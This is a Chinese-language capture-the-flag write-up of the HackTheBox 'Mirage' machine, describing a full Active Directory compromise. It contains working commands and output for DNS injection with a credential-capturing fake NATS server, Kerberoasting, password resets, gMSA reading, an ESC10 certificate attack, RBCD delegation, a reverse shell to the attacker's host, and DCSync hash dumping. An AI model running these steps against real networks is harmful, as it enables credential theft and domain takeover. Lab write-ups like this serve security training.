基本信息

端口扫描

没有web端口,常规windows域端口和2049的nfs:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
$ nmap -sC -sV -Pn 10.10.11.78
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-26 11:23 JST
Nmap scan report for 10.10.11.78
Host is up (0.19s latency).
Not shown: 985 closed tcp ports (conn-refused)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-26 09:00:54Z)
111/tcp   open  rpcbind?
| rpcinfo:
|   program version    port/proto  service
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|_  100003  2,3,4       2049/tcp6  nfs
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after:  2105-07-04T19:58:41
|_ssl-date: TLS randomness does not represent time
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after:  2105-07-04T19:58:41
|_ssl-date: TLS randomness does not represent time
2049/tcp  open  nfs           2-4 (RPC #100003)
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after:  2105-07-04T19:58:41
|_ssl-date: TLS randomness does not represent time
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after:  2105-07-04T19:58:41
|_ssl-date: TLS randomness does not represent time
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49165/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2025-07-26T09:01:49
|_  start_date: N/A
|_clock-skew: 6h36m18s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 222.48 seconds

nfs

nfs未授权访问,可以看到有个MirageReports 

1
2
3
$ showmount -e 10.10.11.78
Exports list on 10.10.11.78:
/MirageReports                      Everyone

挂载查看内容,可以看到两个pdf,复制到本地查看:

1
sudo mount -t nfs 10.10.11.78:/MirageReports ./mirage

Incident_Report_Missing_DNS_Record_nats-svc.pdf

关于缺少nats-svc相关dns记录的报告:

Mirage_Authentication_Hardening_Report.pdf

关于逐步取消NTLM认证,只使用kerberos的相关报告:

nats-svc

这里是可以未授权添加dns记录,根据前面pdf看到的信息,添加nats-svc记录,本地启动fake nats server,获取到认证信息:

1
2
3
4
5
6
└─$ sudo nsupdate
> server 10.10.11.78
> update add nats-svc.mirage.htb 3600 A 10.10.14.6
> send

Dev_Account_A hx5h7F5554fP@1337!

nats

然后使用得到的信息连接nats server,广播message中获取到另一个用户认证信息:

1
2
3
4
5
6
7
8
9
10
nats -s nats://10.10.11.78:4222 rtt --user Dev_Account_A --password 'hx5h7F5554fP@1337!'

nats -s nats://10.10.11.78:4222  --user Dev_Account_A --password 'hx5h7F5554fP@1337!' stream info

> auth_logs
Subjects: logs.auth

nats -s nats://10.10.11.78:4222  --user Dev_Account_A --password 'hx5h7F5554fP@1337!' sub logs.auth --all

david.jjackson pN8kQmn6b86!1234@

fake_server.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
import socket

print("[+] Fake NATS Server listening on 0.0.0.0:4222")
s = socket.socket()
s.bind(("0.0.0.0", 4222))
s.listen(5)

while True:
    client, addr = s.accept()
    print(f"[+] Connection from {addr}")

    # Send fake INFO (obligatoire pour handshake NATS)
    client.sendall(b'INFO {"server_id":"FAKE","version":"2.11.0","auth_required":true}\r\n')

    data = client.recv(1024)
    print("[>] Received:")
    print(data.decode())

    # Optional: respond with -ERR or close connection
    client.close()

david.jjackson to nathan.aadam

得到有效的用户名和密码,那就先常规bloodhound之类

1
2
3
4
5
nxc ldap 10.10.11.78 -u david.jjackson -p 'pN8kQmn6b86!1234@' -k

bloodhound-python -u david.jjackson -p 'pN8kQmn6b86!1234@' -d mirage.htb -k -ns 10.10.11.78 -c All --zip

nxc smb dc01.mirage.htb -u david.jjackson -p 'pN8kQmn6b86!1234@' -k --rid-brute | grep SidTypeUser | cut -d ':' -f2 | cut -d '\' -f2 | cut -d ' ' -f1 > users.txt

暂时没有直接可用的路径,但可以看到nathan.aadam kerberoastable:

nathan.aadam

获取hash,破解出nathan.aadam密码

1
2
3
4
5
nxc ldap dc01.mirage.htb -u david.jjackson -p 'pN8kQmn6b86!1234@' -k --kerberoasting hash.txt

sudo hashcat -m 13100 hash.txt ~/Tools/dict/rockyou.txt

3edc#EDC3

users.txt

1
2
3
4
5
6
7
8
9
10
11
12
Administrator
Guest
krbtgt
DC01$
Dev_Account_A
Dev_Account_B
david.jjackson
javier.mmarshall
mark.bbond
nathan.aadam
Mirage-Service$
svc_mirage

user flag

nathan.aadam kerberos认证登录:

1
2
3
4
5
6
7
nxc smb dc01.mirage.htb -u nathan.aadam -p '3edc#EDC3' -k --generate-krb5-file krb5.conf

impacket-getTGT 'mirage.htb/nathan.aadam:3edc#EDC3' -dc-ip 10.10.11.78

export KRB5CCNAME=nathan.aadam.ccache

evil-winrm -i dc01.mirage.htb -r mirage.htb

nats-server.conf

常规翻文件可以在nats-server.conf里找到几个用户密码

1
2
3
4
5
*Evil-WinRM* PS C:\Program Files\Nats-Server> cat nats-server.conf

sysadmin bb5M0k5XWIGD
Dev_Account_A hx5h7F5554fP@1337!
Dev_Account_B tvPFGAzdsJfHzbRJ

mark.bbond

Autologon里可以获取到mark.bbond的密码,常规winpes之类,或者直接注册表:

1
2
3
4
reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

mark.bbond
1day@atime

mark.bbond to JAVIER.MMARSHALL

mark.bbond是IT Support组成员,对JAVIER.MMARSHALL有ForceChangePassword权限:

所以直接改JAVIER.MMARSHALL密码:

1
bloodyAD --host "dc01.mirage.htb" -d "mirage.htb" --dc-ip 10.10.11.78 -u "mark.bbond" -p "1day@atime" -k set password "JAVIER.MMARSHALL" "P@ssw0rd"

JAVIER.MMARSHALL to MIRAGE-SERVICE$

JAVIER.MMARSHALL对MIRAGE-SERVICE$有ReadGMSAPassword:

但JAVIER.MMARSHALL暂时是禁用状态,需要先启用:

1
2
3
4
5
6
7
# 切换到IT Suppport的mark.bbond
.\RunasCs.exe mark.bbond "1day@atime" powershell -r 10.10.14.6:4444

# enable
Enable-ADAccount -Identity "javier.mmarshall"
# 清除logonHours
Set-ADUser -Identity "javier.mmarshall" -Clear logonHours

gmsa

之后就是读gmsa:

1
2
3
nxc ldap dc01.mirage.htb -u JAVIER.MMARSHALL  -p "P@ssw0rd" -k --gmsa

305806d84f7c1be93a07aaf40f0c7866

ESC10

最后一部分是ESC10,前置条件需要手动检查注册表才能发现:

1
reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\"

按照wiki一步步:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
# 修改upn
impacket-getTGT 'mirage.htb/MIRAGE-SERVICE$' -hashes :305806d84f7c1be93a07aaf40f0c7866 -dc-ip 10.10.11.78
export KRB5CCNAME=MIRAGE-SERVICE$.ccache
certipy account update -user 'mark.bbond' -upn 'dc01$@mirage.htb' -u 'mirage-service$@mirage.htb' -k -no-pass -dc-ip 10.10.11.78 -target dc01.mirage.htb

# 请求证书
impacket-getTGT 'mirage.htb/mark.bbond:1day@atime' -dc-ip 10.10.11.78
export KRB5CCNAME=mark.bbond.ccache
certipy req -u mark.bbond@mirage.htb -no-pass -k -ca mirage-DC01-CA -template User -dc-ip 10.10.11.78 -dc-host dc01.mirage.htb

# 还原
export KRB5CCNAME=MIRAGE-SERVICE$.ccache
certipy-ad account -u 'mirage-service$' -k -no-pass -target 'dc01.mirage.htb' -upn 'mark.bbond@mirage.htb' -user 'mark.bbond' update

# 认证
certipy auth -pfx dc01.pfx -dc-ip 10.10.11.78 -ldap-shell

# ldap-shell
set_rbcd dc01$ Mirage-Service$

# S4U2Proxy
export KRB5CCNAME=MIRAGE-SERVICE$.ccache
impacket-getST -spn 'cifs/dc01.mirage.htb' -impersonate 'dc01$' -dc-ip 10.10.11.78  'mirage.htb/Mirage-Service$' -k -no-pass

# secretsdump
export KRB5CCNAME='dc01$@cifs_dc01.mirage.htb@MIRAGE.HTB.ccache'
impacket-secretsdump 'dc01$'@dc01.mirage.htb -k -no-pass -dc-ip 10.10.11.78 -just-dc-user Administrator

7be6d4f3c2b9c0e3560f5a29eeb1afb3

root flag

得到的Administrator kerberos认证登录:

1
2
3
impacket-getTGT -dc-ip 10.10.11.78 "mirage.htb/Administrator" -hashes :7be6d4f3c2b9c0e3560f5a29eeb1afb3
export KRB5CCNAME=Administrator.ccache
evil-winrm -i dc01.mirage.htb -r mirage.htb

hashdump

1
2
3
4
5
6
7
8
9
10
11
12
13
14
impacket-secretsdump Administrator@dc01.mirage.htb -k -no-pass -dc-ip 10.10.11.78 -just-dc-ntlm

mirage.htb\Administrator:500:aad3b435b51404eeaad3b435b51404ee:7be6d4f3c2b9c0e3560f5a29eeb1afb3:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1adcc3d4a7f007ca8ab8a3a671a66127:::
mirage.htb\Dev_Account_A:1104:aad3b435b51404eeaad3b435b51404ee:3db621dd880ebe4d22351480176dba13:::
mirage.htb\Dev_Account_B:1105:aad3b435b51404eeaad3b435b51404ee:fd1a971892bfd046fc5dd9fb8a5db0b3:::
mirage.htb\david.jjackson:1107:aad3b435b51404eeaad3b435b51404ee:ce781520ff23cdfe2a6f7d274c6447f8:::
mirage.htb\javier.mmarshall:1108:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
mirage.htb\mark.bbond:1109:aad3b435b51404eeaad3b435b51404ee:8fe1f7f9e9148b3bdeb368f9ff7645eb:::
mirage.htb\nathan.aadam:1110:aad3b435b51404eeaad3b435b51404ee:1cdd3c6d19586fd3a8120b89571a04eb:::
mirage.htb\svc_mirage:2604:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:b5b26ce83b5ad77439042fbf9246c86c:::
Mirage-Service$:1112:aad3b435b51404eeaad3b435b51404ee:305806d84f7c1be93a07aaf40f0c7866:::

参考资料